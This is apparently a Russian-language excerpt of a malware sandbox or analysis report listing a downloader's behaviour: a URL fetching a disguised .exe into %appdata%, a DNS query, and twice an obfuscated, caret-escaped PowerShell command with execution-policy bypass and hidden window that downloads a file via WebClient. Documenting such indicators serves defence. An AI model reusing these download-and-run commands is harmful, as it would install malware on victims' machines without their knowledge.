Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWE^R^sHEL^l.E^xe -^E^x^EcU^TIoN^Pol^IC^y ^BY^pA^S^S^ -NOPR^ofI^LE^ ^-^wiNd^oW^ST^Yl^e H^i^DD^En (NE^w^-OB^jE^c^T ^sYST^EM^.neT.wE^BC^L^i^E^nt).D^o^w^NlO^aDFIlE('http://www....
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "poWE^R^sHEL^l.E^xe -^E^x^EcU^TIoN^Pol^IC^y ^BY^pA^S^S^ -NOPR^ofI^LE^ ^-^wiNd^oW^ST^Yl^e H^i^DD^En (NE^w^-OB^jE^c^T ^sYST^EM^.neT.wE^BC^L^i^E^nt).D^o^w^NlO^aDFIlE('http://www....' (со скрытым окном)